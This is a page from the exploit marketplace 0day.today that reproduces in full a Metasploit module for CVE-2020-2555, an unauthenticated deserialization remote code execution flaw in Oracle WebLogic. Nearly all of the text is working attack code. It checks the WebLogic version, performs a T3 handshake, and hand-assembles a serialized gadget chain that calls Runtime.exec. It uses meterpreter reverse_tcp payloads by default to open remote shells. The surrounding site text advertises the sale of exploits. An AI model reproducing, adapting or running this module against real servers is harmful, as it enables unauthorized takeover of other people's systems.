0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
WebLogic Server Deserialization Remote Code Execution Exploit
Author
Risk
[
Security Risk Critical
]0day-ID
Category
Date add
CVE
Platform
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::CmdStager include Msf::Exploit::Powershell include Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'WebLogic Server Deserialization RCE - BadAttributeValueExpException', 'Description' => %q{ There exists a Java object deserialization vulnerability in multiple versions of WebLogic. Unauthenticated remote code execution can be achieved by sending a serialized BadAttributeValueExpException object over the T3 protocol to vulnerable WebLogic servers. }, 'License' => MSF_LICENSE, 'Author' => [ 'Jang', # Vuln Discovery 'Y4er', # PoC 'Shelby Pace' # Metasploit Module ], 'References' => [ [ 'CVE', '2020-2555' ], [ 'URL', 'https://www.thezdi.com/blog/2020/3/5/cve-2020-2555-rce-through-a-deserialization-bug-in-oracles-weblogic-server' ], [ 'URL', 'https://github.com/Y4er/CVE-2020-2555' ] ], 'Platform' => %w[unix linux win], 'Arch' => [ ARCH_X86, ARCH_X64 ], 'Privileged' => false, 'Targets' => [ [ 'Windows', { 'Platform' => 'win', 'Arch' => [ ARCH_X86, ARCH_X64 ], 'DefaultOptions' => { 'Payload' => 'windows/meterpreter/reverse_tcp' } } ], [ 'Unix', { 'Platform' => %w[unix linux], 'CmdStagerFlavor' => 'printf', 'Arch' => [ ARCH_X86, ARCH_X64 ], 'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' } } ], ], 'DisclosureDate' => '2020-01-15', 'DefaultTarget' => 0 ) ) register_options([ Opt::RPORT(7001) ]) end def check connect web_req = "GET /console/login/LoginForm.jsp HTTP/1.1\nHost: #{peer}\n\n" sock.put(web_req) sleep(2) res = sock.get_once versions = [ Gem::Version.new('12.1.3.0.0'), Gem::Version.new('12.2.1.3.0'), Gem::Version.new('12.2.1.4.0') ] return CheckCode::Unknown('Failed to obtain response from service') unless res /WebLogic\s+Server\s+Version:\s+(?<version>\d+\.\d+\.\d+\.*\d*\.*\d*)/ =~ res return CheckCode::Unknown('Failed to detect WebLogic') unless version @version_no = Gem::Version.new(version) print_status("WebLogic version detected: #{@version_no}") return CheckCode::Appears if versions.include?(@version_no) CheckCode::Detected('Version of WebLogic is not vulnerable') ensure disconnect end def exploit super connect print_status('Sending handshake...') t3_handshake if target.name == 'Windows' win_obj = cmd_psh_payload(payload.encoded, payload_instance.arch.first, { remove_comspec: true }) win_obj.prepend('cmd.exe /c ') win_obj = build_payload_obj(win_obj) t3_send(win_obj) else execute_cmdstager end ensure disconnect end def t3_handshake # t3 12.2.1\nAS:255 # \nHL:19\nMS:100000 # 00\n\n shake = '74332031322e322e310a41533a323535' shake << '0a484c3a31390a4d533a313030303030' shake << '30300a0a' sock.put([shake].pack('H*')) sleep(1) sock.get_once end def build_payload_obj(payload_data) payload_obj = 'aced' # STREAM_MAGIC payload_obj << '0005' # STREAM_VERSION payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC payload_obj << '002e' # Class name length: 46 payload_obj << '6a617661782e6d616e61' # Class name: javax.management.BadAttributeValueExpException payload_obj << '67656d656e742e426164' payload_obj << '41747472696275746556' payload_obj << '616c7565457870457863' payload_obj << '657074696f6e' payload_obj << 'd4e7daab632d4640' # SerialVersionUID payload_obj << '020001' # Serialization flag, field num = 1 payload_obj << '4c0003' # Field type code: 4c = Object, field name length: 3 payload_obj << '76616c' # Field name: val payload_obj << '740012' # String, length: 18 payload_obj << '4c6a6176612f6c616e672f4f626a6563743b' # Ljava/lang/Object; payload_obj << '7872' # end block data, TC_CLASSDESC payload_obj << '0013' # Class name length: 19 payload_obj << '6a6176612e6c616e672e' # java.lang.Exception payload_obj << '457863657074696f6e' payload_obj << 'd0fd1f3e1a3b1cc4' # SerialVersionUID payload_obj << '020000' # Serializable, No fields payload_obj << '7872' # end block data, TC_CLASSDESC payload_obj << '0013' # Class name length: 19 payload_obj << '6a6176612e6c616e672e' # java.lang.Throwable payload_obj << '5468726f7761626c65' payload_obj << 'd5c635273977b8cb' # SerialVersionUID payload_obj << '030004' # ?, then 4 fields payload_obj << '4c0005' # Field type: Object, field name length: 5 payload_obj << '6361757365' # Field name: cause payload_obj << '740015' # String, length: 21 payload_obj << '4c6a6176612f6c616e67' # Ljava/lang/Throwable; payload_obj << '2f5468726f7761626c653b' payload_obj << '4c000d' # Field type: Object, field name length: 13 payload_obj << '64657461696c4d657373616765' # Field name: detailMessage payload_obj << '740012' # String, length: 18 payload_obj << '4c6a6176612f6c616e67' # Ljava/lang/String; payload_obj << '2f537472696e673b' payload_obj << '5b000a' # Field type: 5b = array, field name length: 10 payload_obj << '737461636b5472616365' # Field name: stackTrace payload_obj << '74001e' # String, length: 30 payload_obj << '5b4c6a6176612f6c616e' # [Ljava/lang/StackTraceElement; payload_obj << '672f537461636b547261' payload_obj << '6365456c656d656e743b' payload_obj << '4c0014' # Field type: Object, field name length: 20 payload_obj << '73757070726573736564' # Field name: suppressedExceptions payload_obj << '457863657074696f6e73' payload_obj << '740010' # String, length: 16 payload_obj << '4c6a6176612f7574696c' # Ljava/util/List; payload_obj << '2f4c6973743b' payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL payload_obj << '71' # TC_REFERENCE payload_obj << '007e0008' # handle? payload_obj << '7075' # TC_NULL, TC_ARRAY payload_obj << '72001e' # TC_CLASSDESC, Class name length: 30 payload_obj << '5b4c6a6176612e6c616e' # [Ljava.lang.StackTraceElement; payload_obj << '672e537461636b547261' payload_obj << '6365456c656d656e743b' payload_obj << '02462a3c3cfd2239' # SerialVersionUID payload_obj << '020000' # Serializable, No fields payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL payload_obj << '00000001' payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC payload_obj << '001b' # Class name length: 27 payload_obj << '6a6176612e6c616e672e' # java.lang.StackTraceElement payload_obj << '537461636b5472616365' payload_obj << '456c656d656e74' payload_obj << '6109c59a2636dd85' # SerialVersionUID payload_obj << '020004' # Serializable, 4 fields payload_obj << '49000a' # Field type: 49 = Integer, field name length: 10 payload_obj << '6c696e654e756d626572' # lineNumber payload_obj << '4c000e' # Field type: Object, field name length: 14 payload_obj << '6465636c6172696e6743' payload_obj << '6c617373' # declaringClass payload_obj << '71' # TC_REFERENCE payload_obj << '007e0005' # handle payload_obj << '4c0008' # Field type: Object, field name length: 8 payload_obj << '66696c654e616d65' # fileName payload_obj << '71' # TC_REFERENCE payload_obj << '007e0005' # handle payload_obj << '4c000a' # Field type: Object, field name length: 10 payload_obj << '6d6574686f644e616d65' # methodName payload_obj << '71' # TC_REFERENCE payload_obj << '007e0005' # handle payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL payload_obj << '00000028' class_name = Rex::Text.rand_text_alphanumeric(8..14) formatted_class = class_name.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join payload_obj << '74' # String payload_obj << class_name.length.to_s(16).rjust(4, '0') payload_obj << formatted_class # Originally Weblogic_2555 -> PoC class name payload_obj << '74' # String payload_obj << (class_name.length + 5).to_s(16).rjust(4, '0') payload_obj << formatted_class # Originally Weblogic_2555.java payload_obj << '2e6a617661' # .java payload_obj << '740004' # String, length: 4 payload_obj << '6d61696e' # main payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC payload_obj << '0026' # Class name length: 38 payload_obj << '6a6176612e7574696c2e' # java.util.Collections$UnmodifiableList payload_obj << '436f6c6c656374696f6e' payload_obj << '7324556e6d6f64696669' payload_obj << '61626c654c697374' payload_obj << 'fc0f2531b5ec8e10' # SerialVersionUID payload_obj << '020001' # Serializable, 1 field payload_obj << '4c0004' # Field type: Object, field name length: 4 payload_obj << '6c697374' # list payload_obj << '71' # TC_REFERENCE payload_obj << '007e0007' # handle payload_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC payload_obj << '002c' # Class name length: 44 payload_obj << '6a6176612e7574696c2e' # java.util.Collections$UnmodifiableCollection payload_obj << '436f6c6c656374696f6e' payload_obj << '7324556e6d6f64696669' payload_obj << '61626c65436f6c6c6563' payload_obj << '74696f6e' payload_obj << '19420080cb5ef71e' # SerialVersionUID payload_obj << '020001' # Serializable, 1 field payload_obj << '4c0001' # Field type: Object, field name length: 1 payload_obj << '63' # Field name: c payload_obj << '740016' # String, length: 22 payload_obj << '4c6a6176612f7574696c' # Ljava/util/Collection; payload_obj << '2f436f6c6c656374696f' payload_obj << '6e3b' payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC payload_obj << '0013' # Class name length: 19 payload_obj << '6a6176612e7574696c2e' # java.util.ArrayList payload_obj << '41727261794c697374' payload_obj << '7881d21d99c7619d' # SerialVersionUID payload_obj << '030001' # ?, 1 field payload_obj << '490004' # Field type: Integer, field name length: 4 payload_obj << '73697a65' # size payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL payload_obj << '00000000' payload_obj << '7704' # TC_BLOCKDATA, length: 4 payload_obj << '00000000' payload_obj << '7871' # TC_ENDBLOCKDATA, TC_REFERENCE payload_obj << '007e0015' # handle payload_obj << '78' # TC_ENDBLOCKDATA payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC payload_obj << '0024' # Class name length: 36 payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.filter.LimitFilter payload_obj << '6f6c2e7574696c2e6669' payload_obj << '6c7465722e4c696d6974' payload_obj << '46696c746572' payload_obj << limit_filter_uid # SerialVersionUID payload_obj << '020006' # Serializable, 6 fields payload_obj << '49000b' # Field type: Integer, field name length: 11 payload_obj << '6d5f635061676553697a65' # m_cPageSize payload_obj << '490007' # Field type: Integer, field name length: 7 payload_obj << '6d5f6e50616765' # m_nPage payload_obj << '4c000c' # Field type: Object, field name length: 12 payload_obj << '6d5f636f6d70617261746f72' # m_comparator payload_obj << '740016' # String, length: 22 payload_obj << '4c6a6176612f7574696c' # Ljava/util/Comparator; payload_obj << '2f436f6d70617261746f' payload_obj << '723b' payload_obj << '4c0008' # Field type: Object, field name length: 8 payload_obj << '6d5f66696c746572' # m_filter payload_obj << '74001a' # String, length: 26 payload_obj << '4c636f6d2f74616e676f' # Lcom/tangosol/util/Filter; payload_obj << '736f6c2f7574696c2f46' payload_obj << '696c7465723b' payload_obj << '4c000f' # Field type: Object, field name length: 15 payload_obj << '6d5f6f416e63686f7242' # m_oAnchorBottom payload_obj << '6f74746f6d' payload_obj << '71' # TC_REFERENCE payload_obj << '007e0001' # handle payload_obj << '4c000c' # Field type: Object, field name length: 12 payload_obj << '6d5f6f416e63686f72546f70' # m_oAnchorTop payload_obj << '71' # TC_REFERENCE payload_obj << '007e0001' # handle unless @version_no == Gem::Version.new('12.1.3.0.0') payload_obj << add_class_desc end payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL payload_obj << '00000000' payload_obj << '00000000' payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC payload_obj << '002c' # Class name length: 44 payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.extractor.ChainedExtractor payload_obj << '6f6c2e7574696c2e6578' payload_obj << '74726163746f722e4368' payload_obj << '61696e65644578747261' payload_obj << '63746f72' payload_obj << chained_extractor_uid # SerialVersionUID payload_obj << '020000' # Serializable, no fields payload_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC payload_obj << '0036' # Class name length: 54 payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.extractor.AbstractCompositeExtractor payload_obj << '6f6c2e7574696c2e6578' payload_obj << '74726163746f722e4162' payload_obj << '737472616374436f6d70' payload_obj << '6f736974654578747261' payload_obj << '63746f72' payload_obj << '086b3d8c05690f44' # SerialVersionUID payload_obj << '020001' # Serializable, 1 field payload_obj << '5b000c' # Field type: Array, field name length: 12 payload_obj << '6d5f61457874726163746f72' # m_aExtractor payload_obj << '740023' # String, length: 35 payload_obj << '5b4c636f6d2f74616e67' # [Lcom/tangosol/util/ValueExtractor; payload_obj << '6f736f6c2f7574696c2f' payload_obj << '56616c75654578747261' payload_obj << '63746f723b' payload_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC payload_obj << '002d' # Class name length: 45 payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.extractor.AbstractExtractor payload_obj << '6f6c2e7574696c2e6578' payload_obj << '74726163746f722e4162' payload_obj << '73747261637445787472' payload_obj << '6163746f72' payload_obj << abstract_extractor_uid # SerialVersionUID payload_obj << '020001' # Serializable, 1 field payload_obj << '490009' # Field type: Integer, field name length: 9 payload_obj << '6d5f6e546172676574' # m_nTarget payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL payload_obj << '00000000' payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC payload_obj << '0032' # Class name length: 50 payload_obj << '5b4c636f6d2e74616e67' # [Lcom.tangosol.util.extractor.ReflectionExtractor; payload_obj << '6f736f6c2e7574696c2e' payload_obj << '657874726163746f722e' payload_obj << '5265666c656374696f6e' payload_obj << '457874726163746f723b' payload_obj << 'dd8b89aed70273ca' # SerialVersionUID payload_obj << '020000' # Serializable, no fields payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL payload_obj << '00000003' payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC payload_obj << '002f' # Class name length: 47 payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.extractor.ReflectionExtractor payload_obj << '6f6c2e7574696c2e6578' payload_obj << '74726163746f722e5265' payload_obj << '666c656374696f6e4578' payload_obj << '74726163746f72' payload_obj << reflection_extractor_uid # SerialVersionUID payload_obj << '02000' # Serializable, variable fields orig: 020002 payload_obj << reflect_extract_count payload_obj << '5b0009' # Field type: Array, field name length: 9 payload_obj << '6d5f616f506172616d' # m_aoParam payload_obj << '740013' # String, length: 19 payload_obj << '5b4c6a6176612f6c616e' # [Ljava/lang/Object; payload_obj << '672f4f626a6563743b' payload_obj << add_sect payload_obj << '4c0009' # Object, length: 9 payload_obj << '6d5f734d6574686f64' # m_sMethod payload_obj << '71' # TC_REFERENCE payload_obj << '007e0005' # handle payload_obj << '7871' # TC_ENDBLOCKDATA, TC_REFERENCE payload_obj << (change_handle? ? '007e001d' : '007e001e') payload_obj << '00000000' payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC payload_obj << '0013' # Class name length: 19 payload_obj << '5b4c6a6176612e6c616e' # [Ljava.lang.Object; payload_obj << '672e4f626a6563743b' payload_obj << '90ce589f1073296c' # SerialVersionUID payload_obj << '020000' # Serializable, no fields payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL payload_obj << '00000002' payload_obj << '74000a' # String, length: 10 payload_obj << '67657452756e74696d65' # getRuntime payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC payload_obj << '0012' # Class name length: 18 payload_obj << '5b4c6a6176612e6c616e' # [Ljava.lang.Class; payload_obj << '672e436c6173733b' payload_obj << 'ab16d7aecbcd5a99' # SerialVersionUID payload_obj << '020000' # Serializable, no fields payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL payload_obj << '00000000' payload_obj << add_tc_null payload_obj << '740009' # String, length: 9 payload_obj << '6765744d6574686f64' # getMethod payload_obj << '7371' # TC_OBJECT, TC_REFERENCE payload_obj << (change_handle? ? '007e0021' : '007e0022') payload_obj << '00000000' payload_obj << '7571' # TC_ARRAY, TC_REFERENCE payload_obj << (change_handle? ? '007e0024' : '007e0025') payload_obj << '00000002' # array size: 2 payload_obj << '7075' # TC_NULL, TC_ARRAY payload_obj << '71' # TC_REFERENCE payload_obj << (change_handle? ? '007e0024' : '007e0025') payload_obj << '00000000' payload_obj << add_tc_null payload_obj << '740006' # TC_STRING, length: 6 payload_obj << '696e766f6b65' # invoke payload_obj << '7371' # TC_OBJECT, TC_REFERENCE payload_obj << (change_handle? ? '007e0021' : '007e0022') payload_obj << '00000000' payload_obj << '7571' # TC_ARRAY, TC_REFERENCE payload_obj << (change_handle? ? '007e0024' : '007e0025') payload_obj << '00000001' payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC payload_obj << '0013' # Class name length: 19 payload_obj << '5b4c6a6176612e6c616e' # [Ljava.lang.String; payload_obj << '672e537472696e673b' payload_obj << 'add256e7e91d7b47' # SerialVersionUID payload_obj << '020000' # Serializable, no fields payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL payload_obj << '00000003' payload_bin = format_payload(payload_data) payload_obj << payload_bin # Original data # --------------------------- # payload_obj << '740007' # String, length: 7 # payload_obj << '2f62696e2f7368' # /bin/sh # payload_obj << '740002' # String, length: 2 # payload_obj << '2d63' # -c # payload_obj << '740017' # String, length: 23 # payload_obj << '746f756368202f746d70' # touch /tmp/blah_ze_blah # payload_obj << '2f626c61685f7a655f62' # payload_obj << '6c6168' # --------------------------- payload_obj << add_tc_null payload_obj << '740004' # String, length: 4 payload_obj << '65786563' # exec payload_obj << '7070' # TC_NULL, TC_NULL payload_obj << '7672' # TC_CLASS, TC_CLASSDESC payload_obj << '0011' # Class name length: 17 payload_obj << '6a6176612e6c616e672e' # java.lang.Runtime payload_obj << '52756e74696d65' payload_obj << '00000000000000000000' payload_obj << '00' payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL end def change_handle? @version_no == Gem::Version.new('12.1.3.0.0') end def limit_filter_uid case @version_no when Gem::Version.new('12.1.3.0.0') '99022596d7b45953' when Gem::Version.new('12.2.1.3.0') 'ab2901b976c4e271' else '954e4590be89865f' end end def chained_extractor_uid case @version_no when Gem::Version.new('12.1.3.0.0') '889f81b0945d5b7f' when Gem::Version.new('12.2.1.3.0') '06ee10433a4cc4b4' else '435b250b72f63db5' end end def abstract_extractor_uid case @version_no when Gem::Version.new('12.1.3.0.0') '658195303e723821' when Gem::Version.new('12.2.1.3.0') '752289ad4d460138' else '9b1be18ed70100e5' end end def reflection_extractor_uid case @version_no when Gem::Version.new('12.1.3.0.0') 'ee7ae995c02fb4a2' when Gem::Version.new('12.2.1.3.0') '87973791b26429dd' else '1f62f564b951b614' end end def reflect_extract_count case @version_no when Gem::Version.new('12.2.1.3.0') '3' else '2' end end def add_sect sect = '' if @version_no == Gem::Version.new('12.2.1.3.0') sect << '4c0011' # Object, length: 17 sect << '6d5f657874726163746f' # m_extractorCached sect << '72436163686564' sect << '71' # TC_REFERENCE sect << '007e0001' # handle end sect end def add_class_desc class_desc = '' class_desc << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC class_desc << '0034' # Class name length: 52 class_desc << '636f6d2e74616e676f73' # com.tangosol.util.filter.AbstractQueryRecorderFilter class_desc << '6f6c2e7574696c2e6669' class_desc << '6c7465722e4162737472' class_desc << '61637451756572795265' class_desc << '636f7264657246696c74' class_desc << '6572' class_desc << 'f3b98201f680eb90' # SerialVersionUID class_desc << '020000' # Serializable, no fields end def add_tc_null return '70' if @version_no == Gem::Version.new('12.2.1.3.0') '' end def t3_send(payload_obj) print_status('Sending object...') request_obj = '000009f3' # Original packet length request_obj << '016501' # CMD_IDENTIFY_REQUEST, flags request_obj << 'ffffffffffffffff' request_obj << '00000071' request_obj << '0000ea60' request_obj << '00000018432ec6' request_obj << 'a2a63985b5af7d63e643' request_obj << '83f42a6d92c9e9af0f94' request_obj << '72027973720078720178' request_obj << '720278700000000c0000' request_obj << '00020000000000000000' request_obj << '00000001007070707070' request_obj << '700000000c0000000200' request_obj << '00000000000000000000' request_obj << '01007006' request_obj << 'fe010000' # separator request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION request_obj << '7372' # TC_OBJECT, TC_CLASSDESC request_obj << '001d' # Class name length: 29 request_obj << '7765626c6f6769632e72' # weblogic.rjvm.ClassTableEntry request_obj << '6a766d2e436c61737354' request_obj << '61626c65456e747279' request_obj << '2f52658157f4f9ed' # SerialVersionUID request_obj << '0c0000' # flags? request_obj << '787072' # TC_ENDBLOCKDATA, TC_NULL, TC_CLASSDESC request_obj << '0024' # Class name length: 36 request_obj << '7765626c6f6769632e63' # weblogic.common.internal.PackageInfo request_obj << '6f6d6d6f6e2e696e7465' request_obj << '726e616c2e5061636b61' request_obj << '6765496e666f' request_obj << 'e6f723e7b8ae1ec9' # SerialVersionUID request_obj << '020009' # Serializable, 9 fields request_obj << '490005' # Field type: Int, field name length: 5 request_obj << '6d616a6f72' # major request_obj << '490005' # Field type: Int, field name length: 5 request_obj << '6d696e6f72' # minor request_obj << '49000b' # Field type: Int, field name length: 11 request_obj << '70617463685570646174' # patchUpdate request_obj << '65' request_obj << '49000c' # Field type: Int, field name length: 12 request_obj << '726f6c6c696e67506174' # rollingPatch request_obj << '6368' request_obj << '49000b' # Field type: Int, field name length: 11 request_obj << '73657276696365506163' # servicePack request_obj << '6b' request_obj << '5a000e' # Field type: Z = Bool, field name length: 14 request_obj << '74656d706f7261727950' # temporaryPatch request_obj << '61746368' request_obj << '4c0009' # Field type: Object, field name length: 9 request_obj << '696d706c5469746c65' # implTitle request_obj << '740012' # String, length: 18 request_obj << '4c6a6176612f6c616e67' # Ljava/lang/String; request_obj << '2f537472696e673b' request_obj << '4c000a' # Field type: Object, field name length: 10 request_obj << '696d706c56656e646f72' # implVendor request_obj << '71007e0003' # TC_REFERENCE, handle request_obj << '4c000b' # Field type: Object, field name length: 11 request_obj << '696d706c56657273696f6e' # implVersion request_obj << '71007e0003' # TC_REFERENCE, handle request_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL request_obj << '7702' # TC_ENDBLOCKDATA request_obj << '000078' request_obj << 'fe010000' # separator request_obj << payload_obj request_obj << 'fe010000' # separator request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION request_obj << '7372' # TC_OBJECT, TC_CLASSDESC request_obj << '001d' # Class name length: 29 request_obj << '7765626c6f6769632e72' # weblogic.rjvm.ClassTableEntry request_obj << '6a766d2e436c61737354' request_obj << '61626c65456e747279' request_obj << '2f52658157f4f9ed' # SerialVersionUID request_obj << '0c0000' request_obj << '787072' # TC_ENDBLOCKDATA, TC_NULL, TC_CLASSDESC request_obj << '0021' # Class name length: 33 request_obj << '7765626c6f6769632e63' # weblogic.common.internal.PeerInfo request_obj << '6f6d6d6f6e2e696e7465' request_obj << '726e616c2e5065657249' request_obj << '6e666f' request_obj << '585474f39bc908f1' # SerialVersionUID request_obj << '020007' # Serializable, 7 fields request_obj << '490005' # Field type: Int, field name length: 5 request_obj << '6d616a6f72' # major request_obj << '490005' # Field type: Int, field name length: 5 request_obj << '6d696e6f72' # minor request_obj << '49000b' # Field type: Int, field name length: 11 request_obj << '70617463685570646174' # patchUpdate request_obj << '65' request_obj << '49000c' # Field type: Int, field name length: 12 request_obj << '726f6c6c696e67506174' # rollingPatch request_obj << '6368' request_obj << '49000b' # Field type: Int, field name length: 11 request_obj << '73657276696365506163' # servicePack request_obj << '6b' request_obj << '5a000e' # Field type: Z = Bool, field name length: 14 request_obj << '74656d706f7261727950' # temporaryPatch request_obj << '61746368' request_obj << '5b0008' # Field type: Array, field name length: 8 request_obj << '7061636b61676573' # packages request_obj << '740027' # String, length: 39 request_obj << '5b4c7765626c6f676963' # [Lweblogic/common/internal/PackageInfo; request_obj << '2f636f6d6d6f6e2f696e' request_obj << '7465726e616c2f506163' request_obj << '6b616765496e666f3b' request_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC request_obj << '0024' # Class name length: 36 request_obj << '7765626c6f6769632e63' # weblogic.common.internal.VersionInfo request_obj << '6f6d6d6f6e2e696e7465' request_obj << '726e616c2e5665727369' request_obj << '6f6e496e666f' request_obj << '972245516452463e' # SerialVersionUID request_obj << '020003' # Serializable, 3 fields request_obj << '5b0008' # Field type: Array, field name length: 8 request_obj << '7061636b61676573' # packages request_obj << '71007e0003' # TC_REFERENCE, handle request_obj << '4c000e' # Field type: Object, field name length: 14 request_obj << '72656c65617365566572' # releaseVersion request_obj << '73696f6e' request_obj << '740012' # String, length: 18 request_obj << '4c6a6176612f6c616e67' # Ljava/lang/String; request_obj << '2f537472696e673b' request_obj << '5b0012' # Field type: Array, field name length: 18 request_obj << '76657273696f6e496e66' # versionInfoAsBytes request_obj << '6f41734279746573' request_obj << '740002' # String, length: 2 request_obj << '5b42' # [B request_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC request_obj << '0024' # Class name length: 36 request_obj << '7765626c6f6769632e63' # weblogic.common.internal.PackageInfo request_obj << '6f6d6d6f6e2e696e7465' request_obj << '726e616c2e5061636b61' request_obj << '6765496e666f' request_obj << 'e6f723e7b8ae1ec9' # SerialVersionUID request_obj << '020009' # Serializable, 9 fields request_obj << '490005' # Field type: Int, field name length: 5 request_obj << '6d616a6f72' # major request_obj << '490005' # Field type: Int, field name length: 5 request_obj << '6d696e6f72' # minor request_obj << '49000b' # Field type: Int, field name length: 11 request_obj << '70617463685570646174' # patchUpdate request_obj << '65' request_obj << '49000c' # Field type: Int, field name length: 12 request_obj << '726f6c6c696e67506174' # rollingPatch request_obj << '6368' request_obj << '49000b' # Field type: Int, field name length: 11 request_obj << '73657276696365506163' # servicePack request_obj << '6b' request_obj << '5a000e' # Field type: Z = Bool, field name length: 14 request_obj << '74656d706f7261727950' # temporaryPatch request_obj << '61746368' request_obj << '4c0009' # Field type: Object, field name length: 9 request_obj << '696d706c5469746c65' # implTitle request_obj << '71007e0005' # TC_REFERENCE, handle request_obj << '4c000a' # Field type: Object, field name length: 10 request_obj << '696d706c56656e646f72' # implVendor request_obj << '71007e0005' # TC_REFERENCE, handle request_obj << '4c000b' # Field type: Object, field name length: 11 request_obj << '696d706c56657273696f' # implVersion request_obj << '6e' request_obj << '71007e0005' # TC_REFERENCE, handle request_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL request_obj << '7702000078' # TC_BLOCKDATA, 2 bytes, TC_ENDBLOCKDATA request_obj << 'fe00ff' # separator request_obj << 'fe010000' request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION request_obj << '7372' # TC_OBJECT, TC_CLASSDESC request_obj << '0013' # Class name length: 19 request_obj << '7765626c6f6769632e72' # weblogic.rjvm.JVMID request_obj << '6a766d2e4a564d4944' request_obj << 'dc49c23ede121e2a' # SerialVersionUID request_obj << '0c0000' request_obj << '787077' # TC_ENDBLOCKDATA, TC_NULL, TC_BLOCKDATA request_obj << '4621' request_obj << '000000000000000000' request_obj << '09' # length: 9 request_obj << '3132372e302e312e31' # 127.0.1.1 request_obj << '000b' # length: 11 request_obj << '75732d6c2d627265656e' # us-l-breens request_obj << '73' request_obj << 'a53caff10000000700' request_obj << '001b59' request_obj << 'ffffffffffffffffffff' request_obj << 'ffffffffffffffffffff' request_obj << 'ffffffff' request_obj << '0078' request_obj << 'fe010000' # separator request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION request_obj << '7372' # TC_OBJECT, TC_CLASSDESC request_obj << '0013' # Class name length: 19 request_obj << '7765626c6f6769632e72' # weblogic.rjvm.JVMID request_obj << '6a766d2e4a564d4944' request_obj << 'dc49c23ede121e2a' # SerialVersionUID request_obj << '0c0000' request_obj << '787077' # TC_ENDBLOCKDATA, TC_NULL, TC_BLOCKDATA request_obj << '1d0181401281' request_obj << '34bf427600093132372e' request_obj << '302e312e31a53caff1' request_obj << '000000000078' new_len = (request_obj.length / 2).to_s(16).rjust(8, '0') request_obj[0, 8] = new_len sock.put([request_obj].pack('H*')) sleep(1) end def format_payload(payload_cmd) print_status('Formatting payload...') payload_arr = payload_cmd.split(' ', 3) formatted_payload = '' payload_arr.each do |part| formatted_payload << '74' # denotes a string formatted_payload << part.length.to_s(16).rjust(4, '0') formatted_payload << part.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join end formatted_payload end def execute_command(cmd, _opts = {}) cmd.prepend('/bin/sh -c ') cmd = build_payload_obj(cmd) t3_send(cmd) end end # 0day.today [2024-12-24] #